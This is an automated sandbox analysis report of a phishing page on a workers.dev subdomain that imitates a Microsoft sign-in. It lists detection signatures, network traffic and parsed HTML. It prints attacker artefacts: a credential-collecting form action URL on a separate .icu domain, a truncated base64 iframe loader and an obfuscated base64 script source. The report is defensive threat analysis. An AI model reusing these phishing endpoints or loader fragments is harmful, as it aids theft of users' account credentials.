Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c

Overview

General Information

Sample URL:https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c
Analysis ID:1649488
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish54
Creates files inside the system directory
Deletes files inside the Windows folder
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains obfuscated script src
Uses insecure TLS / SSL version for HTTPS connection

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,3110005224580043279,10307581202711868803,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
0.5..script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    0.7.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      • Phishing
      • Compliance
      • Software Vulnerabilities
      • Networking
      • System Summary

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev' does not match the legitimate domain., The URL uses a Cloudflare Workers subdomain, which is a common tactic for hosting phishing sites., The URL contains random alphanumeric strings, which is suspicious and not typical for legitimate Microsoft URLs., The presence of input fields for 'Email, phone, or Skype' is consistent with phishing attempts targeting Microsoft accounts. DOM: 0.7.pages.csv
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev' does not match the legitimate domain 'microsoft.com'., The domain 'workers.dev' is a generic domain often used for cloud services, which can be legitimate but is not directly associated with Microsoft., The subdomain and path structure 'e23a311b.5f438d8b1fa34021ffea2c2f' are suspicious and do not resemble any known Microsoft subdomains., The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but given the URL, it raises suspicion of phishing. DOM: 0.8.pages.csv
      Source: Yara matchFile source: 0.5..script.csv, type: HTML
      Source: Yara matchFile source: 0.7.pages.csv, type: HTML
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: Form action: https://dovermhainstrim.icu/common/login workers dovermhainstrim
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: Number of links: 0
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: Base64 decoded: <!doctype html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"></head><body style="margin:0;padding:0"><iframe src="https://dovermhainstrim.icu/?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodH...
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: Iframe src: https://portal.microsoftonline.com/Prefetch/Prefetch.aspx
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: <input type="password" .../> found
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: No favicon
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: No favicon
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: No favicon
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: No favicon
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: No favicon
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: No favicon
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: No favicon
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: No favicon
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: No <meta name="author".. found
      Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49742 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.21.13.238:443 -> 192.168.2.16:49702 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.238:443 -> 192.168.2.16:49701 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.187.31:443 -> 192.168.2.16:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.238:443 -> 192.168.2.16:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.16:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.16:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.219.36.138:443 -> 192.168.2.16:49758 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.9.156:443 -> 192.168.2.16:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49778 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 10MB later: 39MB
      Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49742 version: TLS 1.0
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.32.99
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.172
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.32.99
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.38.172
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c HTTP/1.1Host: e23a311b.5f438d8b1fa34021ffea2c2f.workers.devConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690b6b4f3ea0f4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: e23a311b.5f438d8b1fa34021ffea2c2f.workers.devConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: e23a311b.5f438d8b1fa34021ffea2c2f.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1919245856:1743013575:nXXmh0HbrHlQXpy4m6h5G9OJr9O9QhmryX8dJ0tI8rA/92690b6b4f3ea0f4/SI2OlB0D9.xPaJ8PeD3gTYOjfN8pF9UL6rRfejF24mg-1743017238-1.1.1.1-tcSKqP5HF769OqdkR4FoX5VopIdLNxdgvM8DJn0Ff7mTPcQhDmyZDxZvGHdown3W HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/92690b6b4f3ea0f4/1743017239427/b11b001df3e4df6e56c55deecaddd5320f067bee9f1e79c065e3a3abebc4451a/Lba_3YOgfFBLE2t HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92690b6b4f3ea0f4/1743017239432/udH6orPBiQK-Aio HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92690b6b4f3ea0f4/1743017239432/udH6orPBiQK-Aio HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1919245856:1743013575:nXXmh0HbrHlQXpy4m6h5G9OJr9O9QhmryX8dJ0tI8rA/92690b6b4f3ea0f4/SI2OlB0D9.xPaJ8PeD3gTYOjfN8pF9UL6rRfejF24mg-1743017238-1.1.1.1-tcSKqP5HF769OqdkR4FoX5VopIdLNxdgvM8DJn0Ff7mTPcQhDmyZDxZvGHdown3W HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1919245856:1743013575:nXXmh0HbrHlQXpy4m6h5G9OJr9O9QhmryX8dJ0tI8rA/92690b6b4f3ea0f4/SI2OlB0D9.xPaJ8PeD3gTYOjfN8pF9UL6rRfejF24mg-1743017238-1.1.1.1-tcSKqP5HF769OqdkR4FoX5VopIdLNxdgvM8DJn0Ff7mTPcQhDmyZDxZvGHdown3W HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
